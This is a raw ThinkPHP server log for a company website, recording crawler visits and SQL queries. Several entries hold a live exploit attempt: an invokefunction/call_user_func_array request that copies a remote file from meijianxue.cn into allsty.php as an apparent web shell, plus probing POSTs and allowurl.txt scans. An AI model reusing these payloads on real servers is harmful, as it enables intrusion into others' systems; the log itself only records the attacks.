info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\product\zycp.htm [ array ( 0 => 'res', 1 => 'page', 2 => 'types', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `product` WHERE `cate_id` = 2 AND `state` = 1 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`cate_id`,`type_id`,`name`,`pro_name`,`sp`,`sm_img` FROM `product` WHERE `cate_id` = 2 AND `state` = 1 ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 0,9 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 2 AND `state` = 1 GROUP BY `type_id` [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (1) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T21:19:41+08:00 ] 112.5.37.102 GET /data/admin/allowurl.txt [ info ] www.kinsana.cn/data/admin/allowurl.txt [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,069.09kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'data', 1 => 'admin', 2 => 'allowurl.txt', ), ) [ info ] [ HEADER ] array ( 'content-type' => 'application/x-www-form-urlencoded', 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/data/admin/allowurl_txt' => '', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T21:52:41+08:00 ] 54.36.148.177 GET /index/news/xwxq/id/234.html [ info ] www.kinsana.cn/index/news/xwxq/id/234.html [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:2,175.20kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'deflate, gzip, br', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/234_html' => '', 'id' => '234', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 234 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 234 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T21:59:39+08:00 ] 106.11.158.53 GET /index/news/xwxq/id/108.html [ info ] www.kinsana.cn/index/news/xwxq/id/108.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,170.26kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/108_html' => '', 'id' => '108', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 108 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 108 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T22:12:22+08:00 ] 121.204.133.206 GET /data/admin/allowurl.txt [ info ] www.kinsana.cn/data/admin/allowurl.txt [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,069.09kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'data', 1 => 'admin', 2 => 'allowurl.txt', ), ) [ info ] [ HEADER ] array ( 'content-type' => 'application/x-www-form-urlencoded', 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/data/admin/allowurl_txt' => '', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T22:17:25+08:00 ] 222.186.175.10 GET / [ info ] www.kinsana.cn/ [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,016.39kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip', 'host' => 'www.kinsana.cn', 'user-agent' => 'Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', 'content-type' => 'text/html', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*;q=0.8,application/signed-exchange;v=b3', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T22:23:37+08:00 ] 60.20.198.206 GET /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=copy&vars%5B1%5D%5B%5D=http://meijianxue.cn/dd.txt&vars%5B1%5D%5B%5D=allsty.php [ info ] www.kinsana.cn/index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=copy&vars%5B1%5D%5B%5D=http://meijianxue.cn/dd.txt&vars%5B1%5D%5B%5D=allsty.php [运行时间:0.031250s][吞吐率:32.00req/s] [内存消耗:1,070.77kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => '\\think\\app', 2 => 'invokefunction', ), ) [ info ] [ HEADER ] array ( 'content-type' => 'application/x-www-form-urlencoded', 'accept-language' => 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( 'function' => 'call_user_func_array', 'vars' => array ( 0 => 'copy', 1 => array ( 0 => 'http://meijianxue.cn/dd.txt', 1 => 'allsty.php', ), ), ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T22:23:38+08:00 ] 60.20.198.206 GET /index.php?s=Home/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=copy&vars%5B1%5D%5B%5D=http://meijianxue.cn/dd.txt&vars%5B1%5D%5B%5D=allsty.php%20 [ info ] www.kinsana.cn/index.php?s=Home/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=copy&vars%5B1%5D%5B%5D=http://meijianxue.cn/dd.txt&vars%5B1%5D%5B%5D=allsty.php%20 [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,070.53kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'Home', 1 => '\\think\\app', 2 => 'invokefunction', ), ) [ info ] [ HEADER ] array ( 'content-type' => 'application/x-www-form-urlencoded', 'accept-language' => 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( 'function' => 'call_user_func_array', 'vars' => array ( 0 => 'copy', 1 => array ( 0 => 'http://meijianxue.cn/dd.txt', 1 => 'allsty.php ', ), ), ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T22:23:38+08:00 ] 60.20.198.206 GET /index.php?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=copy&vars%5B1%5D%5B%5D=http://meijianxue.cn/dd.txt&vars%5B1%5D%5B%5D=allsty.php%20%20 [ info ] www.kinsana.cn/index.php?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=copy&vars%5B1%5D%5B%5D=http://meijianxue.cn/dd.txt&vars%5B1%5D%5B%5D=allsty.php%20%20 [运行时间:0.031250s][吞吐率:32.00req/s] [内存消耗:1,070.74kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => '\\think\\Container', 2 => 'invokefunction', ), ) [ info ] [ HEADER ] array ( 'content-type' => 'application/x-www-form-urlencoded', 'accept-language' => 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( 'function' => 'call_user_func_array', 'vars' => array ( 0 => 'copy', 1 => array ( 0 => 'http://meijianxue.cn/dd.txt', 1 => 'allsty.php ', ), ), ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T22:23:39+08:00 ] 60.20.198.206 POST /index.php [ info ] www.kinsana.cn/index.php [运行时间:0.640625s][吞吐率:1.56req/s] [内存消耗:1,074.31kb] [文件加载:39] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'content-length' => '94', 'content-type' => 'application/x-www-form-urlencoded', 'accept-language' => 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)', 'host' => 'www.kinsana.cn', ) [ info ] [ LOG ] INIT File [ error ] [2]copy(allsty.php): failed to open stream: Permission denied[D:\WWW\kinsasa\thinkphp\library\think\Request.php(1065) : assert code:1] --------------------------------------------------------------- [ 2021-07-16T22:23:39+08:00 ] 60.20.198.206 POST /index.php?s=captcha [ info ] www.kinsana.cn/index.php?s=captcha [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,078.70kb] [文件加载:39] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'method', 'method' => array ( 0 => '\\think\\captcha\\CaptchaController', 1 => 'index', ), 'var' => array ( ), ) [ info ] [ HEADER ] array ( 'content-length' => '150', 'content-type' => 'application/x-www-form-urlencoded', 'accept-language' => 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)', 'host' => 'www.kinsana.cn', ) [ info ] [ LOG ] INIT File [ error ] [2]assert(): Assertion failed[D:\WWW\kinsasa\thinkphp\library\think\Request.php:1065] --------------------------------------------------------------- [ 2021-07-16T22:33:17+08:00 ] 39.154.131.72 GET /index.html [ info ] www.kinsana.cn/index.html [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,019.95kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip, deflate', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'accept-language' => 'zh,zh-CN;q=0.9', 'user-agent' => 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.4523.1101 Mobile Safari/537.36', 'upgrade-insecure-requests' => '1', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index_html' => '', ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T22:33:50+08:00 ] 49.7.21.119 GET /index/contanct/zxly.html [ info ] www.kinsana.cn/index/contanct/zxly.html [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,325.84kb] [文件加载:45] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'contanct', 2 => 'zxly', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/contanct/zxly_html' => '', ) [ info ] [ RUN ] app\index\controller\Contanct->zxly[ D:\WWW\kinsasa\application\index\controller\Contanct.php ] [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\contanct\zxly.htm [ array ( ) ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T22:34:12+08:00 ] 106.38.241.188 GET /index/contanct/lxwm.html [ info ] www.kinsana.cn/index/contanct/lxwm.html [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,325.80kb] [文件加载:45] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'contanct', 2 => 'lxwm', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/contanct/lxwm_html' => '', ) [ info ] [ RUN ] app\index\controller\Contanct->lxwm[ D:\WWW\kinsasa\application\index\controller\Contanct.php ] [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\contanct\lxwm.htm [ array ( ) ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T22:35:30+08:00 ] 42.236.10.69 GET / [ info ] www.kinsana.cn/ [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,016.63kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.4.2661.102 Safari/537.36; 360Spider', 'connection' => 'close', 'accept-language' => 'zh-CN', 'accept' => '*/*', 'cookie' => '', 'referer' => 'http://www.kinsana.cn/', 'accept-encoding' => 'deflate, gzip', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T22:36:04+08:00 ] 118.184.177.54 GET /index/zp/rczp.html [ info ] www.kinsana.cn/index/zp/rczp.html [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,960.57kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'zp', 2 => 'rczp', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/zp/rczp_html' => '', ) [ info ] [ RUN ] app\index\controller\Zp->rczp[ D:\WWW\kinsasa\application\index\controller\Zp.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\zp\rczp.htm [ array ( 0 => 'res', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `zp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `zp` WHERE `state` = 1 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T22:55:31+08:00 ] 54.36.148.181 GET /index/news/xwxq/id/232.html [ info ] www.kinsana.cn/index/news/xwxq/id/232.html [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,169.44kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'deflate, gzip, br', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/232_html' => '', 'id' => '232', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 232 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 232 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T23:03:27+08:00 ] 49.7.21.70 GET /index/news/xwxq/id/217.html [ info ] www.kinsana.cn/index/news/xwxq/id/217.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,172.56kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/217_html' => '', 'id' => '217', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 217 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 217 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T23:07:44+08:00 ] 123.183.224.91 GET /index/contanct/yfzx.html [ info ] www.kinsana.cn/index/contanct/yfzx.html [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,325.81kb] [文件加载:45] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'contanct', 2 => 'yfzx', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/contanct/yfzx_html' => '', ) [ info ] [ RUN ] app\index\controller\Contanct->yfzx[ D:\WWW\kinsasa\application\index\controller\Contanct.php ] [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\contanct\yfzx.htm [ array ( ) ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T23:50:11+08:00 ] 185.191.171.13 GET 